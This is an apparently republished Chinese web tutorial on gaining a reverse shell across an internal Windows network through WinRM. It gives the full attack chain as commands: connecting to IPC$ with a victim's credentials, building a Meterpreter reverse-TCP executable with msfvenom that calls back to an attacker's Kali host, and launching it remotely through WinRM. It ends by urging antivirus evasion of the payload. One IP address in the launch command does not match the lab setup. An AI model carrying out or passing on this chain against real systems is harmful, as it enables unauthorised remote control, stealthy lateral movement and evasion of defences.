加入收藏 | 设为首页 | 会员中心 | 我要投稿 聊城站长网 (https://www.0635zz.com/)- 智能语音交互、行业智能、AI应用、云计算、5G!
当前位置: 首页 > 服务器 > 安全 > 正文

怎么巧用WinRM实现内网无文件攻击反弹shell

发布时间:2023-07-29 14:07:12 所属栏目:安全 来源:
导读:如何利用WinRM实现内网无文件攻击反弹shell,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

0x00:前言

WinRM是Windows
如何利用WinRM实现内网无文件攻击反弹shell,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
 
0x00:前言
 
WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80端口或者443端口。这样一来,我们就可以在对方有设置防火墙的情况下远程管理这台服务器了。
 
Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该WinRM服务便被设置为默认开启。Win7系统中却默认安装此WinRM服务,但是默认为禁用状态,Win8系统和Win10系统也都默认开启WinRM服务。
 
WinRM的好处在于,这种远程连接不容易被察觉到,也不会占用远程连接数!
 
0x01:环境准备
 
WinRM会用到5985、5986 端口,所以防火墙必须做开放处理。
 
用Administrator账户登录攻击机器
 
前提知道被攻击方的用户登录账户密码
 
Windows操作系统中,默认是开启共享IPC$的
 
IP:192.168.124.30(server2016)  
 
IP:192.168.124.20(win7)
 
IP:192.168.124.32(Kali)
 
0x02:攻击过程
 
一、快速在(server2016)运行winrm
 
命令:winrm quickconfig

二、net use连接(win7)
 
命令:net use \\192.168.124.20\ipc$ “密码” /user:“用户名”
 
尝试调用本地”calc.exe”.
 
成功
 
在(win7)中需要被远程访问的文件,开启文件共享。
 
开启共享文件夹,并添加访问用户的权限,使其能够远程访问。
 
四、在(win7)中放置木马,并且用(kali)接收反弹的shell
 
生成shellcode
 
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.124.32 lport=7777 -f exe -o ./luomiweixiong.exe

把”luomiweixiong.exe”放在(win7)的C盘根目录.
 
3、kali启动监听shell模式
 
利用(server2016)的WinRM 实现内网无文件攻击反弹shell
 
在(server2016)中执行以下命令
 
winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.12.20\c\luomiweixiong.exe"}
 
反弹成功
 
0x03:总结
 
shellcode还可以做一些免杀处理,使其更加的完美。
 
 

(编辑:聊城站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!